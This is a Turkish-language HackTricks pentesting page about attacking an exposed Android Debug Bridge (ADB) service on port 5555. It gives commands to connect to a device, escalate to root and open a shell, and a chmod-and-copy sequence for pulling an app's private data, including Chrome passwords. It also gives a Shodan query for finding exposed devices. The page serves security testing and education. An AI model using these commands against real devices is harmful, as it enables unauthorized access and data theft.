hacktricks/network-services-pentesting/5555-android-debug-bridge.md
2024-02-10 18:14:16 +00:00

4.1 KiB
Raw Blame History

5555 - Android Debug Köprüsü

AWS hacklemeyi sıfırdan kahraman olmak için htARTE (HackTricks AWS Kırmızı Takım Uzmanı) öğrenin!

HackTricks'i desteklemenin diğer yolları:

Temel Bilgiler

Belgelerden alınan bilgilere göre:

Android Debug Köprüsü (adb), bir cihazla iletişim kurmanızı sağlayan çok yönlü bir komut satırı aracıdır. adb komutu, uygulamaların yüklenmesi ve hata ayıklanması gibi çeşitli cihaz eylemlerini kolaylaştırır ve bir cihazda çeşitli komutları çalıştırmak için kullanabileceğiniz bir Unix kabuğuna erişim sağlar.

Varsayılan port: 5555.

PORT     STATE SERVICE VERSION
5555/tcp open  adb     Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)

Bağlan

Eğer bir cihazın bir bağlantı noktasında çalışan ADB hizmetini bulursanız ve buna bağlanabilirseniz, sistem içinde bir kabuk alabilirsiniz:

adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell

Daha fazla ADB komutu için aşağıdaki sayfayı kontrol edin:

{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}

Uygulama verilerini dökümleme

Bir uygulamanın verilerini tamamen indirmek için şunları yapabilirsiniz:

# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"

Bu hileyi kullanarak chrome şifreleri gibi hassas bilgileri alabilirsiniz. Bu konuyla ilgili daha fazla bilgi için buradaki bilgilere ve referanslara bakabilirsiniz.

Shodan

  • android debug bridge
htARTE (HackTricks AWS Red Team Expert) ile sıfırdan kahraman olmak için AWS hackleme öğrenin!

HackTricks'i desteklemenin diğer yolları: